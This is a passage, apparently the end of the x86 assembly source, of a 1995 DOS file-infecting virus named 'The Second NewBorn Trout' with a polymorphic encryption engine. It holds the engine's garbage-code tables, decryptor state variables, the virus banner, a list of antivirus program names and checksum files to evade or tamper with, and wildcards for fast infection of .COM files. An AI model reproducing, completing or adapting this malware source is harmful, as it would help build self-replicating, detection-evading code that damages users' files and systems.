030h,000h,01ah,019h,00eh,003h,00bh,006h,005h,005h,0ffh garb_c6a db 030h,000h,03ah,00fh,00eh,003h,00bh,006h,005h,005h,0ffh garb_c6b db 030h,000h,038h,00fh,00eh,003h,00bh,006h,005h,005h,0ffh garb_c6c db 030h,000h,032h,019h,00eh,003h,00bh,006h,005h,005h,0ffh garb_c6d db 030h,000h,022h,019h,00eh,003h,00bh,006h,005h,005h,0ffh garb_c6e db 030h,000h,00ah,019h,00eh,003h,00bh,006h,005h,005h,0ffh garb_c6f db 030h,000h,08ah,01dh,003h,0ffh garb_c70 db 030h,000h,002h,01dh,003h,0ffh garb_c71 db 030h,000h,012h,01dh,003h,0ffh garb_c72 db 030h,000h,02ah,01dh,003h,0ffh garb_c73 db 030h,000h,01ah,01dh,003h,0ffh garb_c74 db 030h,000h,03ah,013h,003h,0ffh garb_c75 db 030h,000h,038h,013h,003h,0ffh garb_c76 db 030h,000h,032h,01dh,003h,0ffh garb_c77 db 030h,000h,022h,01dh,003h,0ffh garb_c78 db 030h,000h,00ah,01dh,003h,0ffh garb_c79 db 024h,00bh,0b8h,005h,005h,0ffh garb_c7a db 000h,081h,029h,00bh,0c0h,005h,005h,0ffh garb_c7b db 000h,081h,029h,00bh,0d0h,005h,005h,0ffh garb_c7c db 000h,081h,029h,00bh,0e8h,005h,005h,0ffh garb_c7d db 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000h,009h,02ah,00bh,0c0h,0ffh garb_c91 db 000h,08bh,022h,00bh,0c0h,0ffh garb_c92 db 000h,003h,022h,00bh,0c0h,0ffh garb_c93 db 000h,013h,022h,00bh,0c0h,0ffh garb_c94 db 000h,02bh,022h,00bh,0c0h,0ffh garb_c95 db 000h,01bh,022h,00bh,0c0h,0ffh garb_c96 db 000h,03bh,022h,00bh,0c0h,0ffh garb_c97 db 000h,033h,022h,00bh,0c0h,0ffh garb_c98 db 000h,023h,022h,00bh,0c0h,0ffh garb_c99 db 000h,00bh,022h,00bh,0c0h,0ffh garb_c9a db 000h,087h,02ch,00bh,0c0h,0ffh garb_c9b db 029h,00bh,040h,0ffh garb_c26 db 029h,00bh,048h,0ffh garb_c9d db 000h,0f7h,01fh,00bh,0c0h,005h,005h,0ffh garb_c9e db 000h,085h,020h,00bh,0c0h,0ffh garb_c9f db 000h,085h,01fh,00eh,003h,00bh,006h,009h,005h,0ffh garb_ca0 db 000h,0f7h,024h,00bh,0d0h,0ffh garb_ca1 db 000h,0f7h,029h,00bh,0d8h,0ffh garb_ca2 db 000h,0d1h,029h,00bh,0c8h,0ffh garb_ca3 db 000h,0d1h,029h,00bh,0c0h,0ffh garb_ca4 db 000h,0d1h,029h,00bh,0e8h,0ffh garb_ca5 db 000h,0d1h,029h,00bh,0e0h,0ffh garb_ca6 db 000h,0d1h,029h,00bh,0f8h,0ffh garb_ca7 db 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030h,000h,00bh,029h,00eh,003h,00bh,006h,009h,005h,0ffh garb_cb9 db 000h,08dh,02dh,003h,0ffh garb_cbc db 000h,08dh,02dh,00bh,040h,005h,0ffh garb_cbd db 000h,08dh,02dh,00bh,080h,005h,005h,0ffh garb_cbe db 032h,0ffh,02fh,000h,0ffh,001h,004h,0b4h,00bh,0cdh,021h db 0ffh garb_cbf db 032h,0ffh,02eh,004h,0ffh,001h,004h,0b4h,00dh,0cdh,021h db 0ffh garb_cc0 db 032h,0ffh,02fh,000h,0ffh,001h,004h,0b4h,019h,0cdh,021h db 0ffh garb_cc1 db 032h,0ffh,02fh,000h,0ffh,02fh,001h,0ffh,02fh,002h,0ffh db 001h,004h,0b4h,02ah,0cdh,021h,0ffh garb_cc2 db 032h,0ffh,02eh,004h,0ffh,02fh,001h,0ffh,02fh,002h,0ffh db 001h,004h,0b4h,02ch,0cdh,021h,0ffh garb_cc3 db 032h,0ffh,02fh,000h,0ffh,02fh,003h,0ffh,02fh,001h,0ffh db 001h,004h,0b4h,030h,0cdh,021h,0ffh garb_cc4 db 032h,0ffh,02fh,000h,0ffh,02eh,002h,0ffh,001h,005h,0b8h db 000h,033h,0cdh,021h,0ffh garb_cc5 db 032h,0ffh,02fh,000h,0ffh,001h,004h,0b4h,054h,0cdh,021h db 0ffh garb_cc6 db 032h,0ffh,02fh,000h,0ffh,02fh,001h,0ffh,02fh,002h,0ffh db 001h,004h,0b4h,003h,0cdh,010h,0ffh garb_cc7 db 032h,0ffh,02fh,000h,0ffh,02eh,007h,0ffh,001h,004h,0b4h db 00fh,0cdh,010h,0ffh garb_cc8 db 032h,0ffh,02eh,004h,0ffh,02eh,002h,0ffh,001h,004h,0b4h db 000h,0cdh,013h,0ffh garb_cc9 db 032h,0ffh,02eh,004h,0ffh,02eh,002h,0ffh,001h,004h,0b4h db 001h,0cdh,013h,0ffh ; Registers at TT-PEB call (saved poly parameters) tt_saved_sp dw 0 tt_saved_ss dw 0 tt_saved_dx dw 0 tt_saved_ds dw 0 tt_saved_cx dw 0 tt_saved_bp dw 0 tt_saved_si dw 0 tt_saved_ax dw 0 pntr_reg db 0FFh ; Register used as pointer (FF = not set yet) pntr_pos dw 000h ; Position in memory where pointer assignment ; is done cntr_reg db 0FFh ; Register used as counter (FF = not set yet) oper_reg db 0FFh ; Register used for opers (FF = not set yet) db 0 dec_loop_start dw 000h ; Pointer at beginning of the decryption loop pntr_chdone db 0 ; FFh if code to update the pointer in the ; decr loop hasn't been already generated. ; 00h pointer update already done cntr_chdone db 0 ; FFh if code to update the counter in the ; decr loop hasn't been already generated. ; 00h counter update already done encr_pnt dw 000h ; Pointer at beginning of encrypted code after ; decryptor mate_pos dw 000h ; Position on the math operation math_oc db 00h ; Opcode of the decryptor (the inverse of ; the encryptor) mathpos dw 000h ; Position of the math operation (again) spec_cnst db 0FFh ; FFh can create, 00h can't create some_lock db 0FFh ; FFh can create, 00h can't create decr_init db 0FFh ; 00h building main decrypt. loop, FFh not yet ; this three varialbes are used to limit in ; some circumstances the generation of some ; kind of code (for example a call in another ; call construct and soo on) db 'STACK STACK STACK STACK STACK STACK ' db 'STACK STACK STACK STACK STACK STACK ' db 'STACK STACK STACK STACK STACK STACK ' db 'STACK STACK STACK STACK STACK STACK ' db 'STACK STACK STACK STACK STACK STACK ' db 'STACK STACK STACK STACK ' tt_stack: ; TT-PEB stack grows (backwards :) ) from here int21h_jump db 0e9h ; jmp to int21h handler dw offset int21h_handler - 103h ; in memory (so the -) db '2T' ; 2Trout marker virus_message: db 'This is "The Second NewBorn Trout" virus',0dh,0ah db 'Programmed in the city of Milan, North Italy',0dh,0ah db '[C] The Tricky Trout 1995', 0dh, 0ah db 'Mutation Engine: TT-PEB ' db '(Tricky Trout Plurimorphic Encryptor Builder) ' db 'version 2.01 (TPE standard)',0dh,0ah orig_bytes db 0cdh,020h,090h,090h,090h com_suffix db 'COM',0,0 os_files db 'IBMBIO.','IBMDOS.','COMMAND.', 0 av_names db 'SCAN.','NETSCAN.','CLEAN.','VSHIELD.' db 'F-PROT.','VSAFE.','MSAV.','CPAV.' db 'NAV.','TBAV.','TBSCAN.','VDS.','NOVI.' db 'AVP.','-V.','-VPRO.','VIREX.','AVSCAN.' db 'VI-SPY.','GUARD.','FINDVIRU.','TNT.','TNTAV.' db 'HTSCAN.','NEMESIS.','NOD.','ITAV.','VI.' db 'VIRIT.','IM.','WIN.','TD.','DEBUG.', 0 crc_files db 'CHKLIST.MS', 0 db 'CHKLIST.CPS', 0 db 'ANTI-VIR.DAT', 0 db '\SCANCRC.CRC', 0 db '\_CHK.CHK', 0 db '\NAV_._NO',0 crc_files_end db 0 fastfile1 db 'C:*.COM', 0 ; fastinfection wildcards fastfile2 db 'C:\DOS\KEYB.COM', 0 ; for the installation on fastfile3 db 'C:\DOS\*.COM', 0 ; the new system :) fastfile4 db '*.COM', 0 poly_in_mem db 0 ; 00h means it is run normally from file ; 01h means the virus is executed from a poly ; generation in memory (when an AV is going ; to be run). the 01h is at the same time ; used as the value where the seg:off of ; the jump to int21h is, this is at ; virussegment:1) poly_segmem dw 0000h ; segment of the virus in memory at ; disactivation when an AV started encvir_dx dw 0 ; seg:off of the encrypted encvir_ds dw 0 ; virus in memory orig_int21h dw 0000h, 0000h ; seg:off of original int 21h int24_off dw 0000h int24_seg dw 0000h fast_cntr db 0 ; infected files during fast ; infection good_inf db 0 ; 01h last fast infection was ; succesfull, 00h it wasn't finf_name dw 0000h, 0000h ; DS:DX on filename that is ; going to be infected orig_att dw 00h ; original file attributes f_time db 000h ; -> Virus end on disk ! <- tsnbt_fend: db 00h f_date dw 00h ; original file date f_length dw 00h ; original file length mem_buff db 1eh dup (?) buff_1 db 12h dup (?) buff_2 db 3336h dup (?) mem_end: seg_a ends end tsnbt_start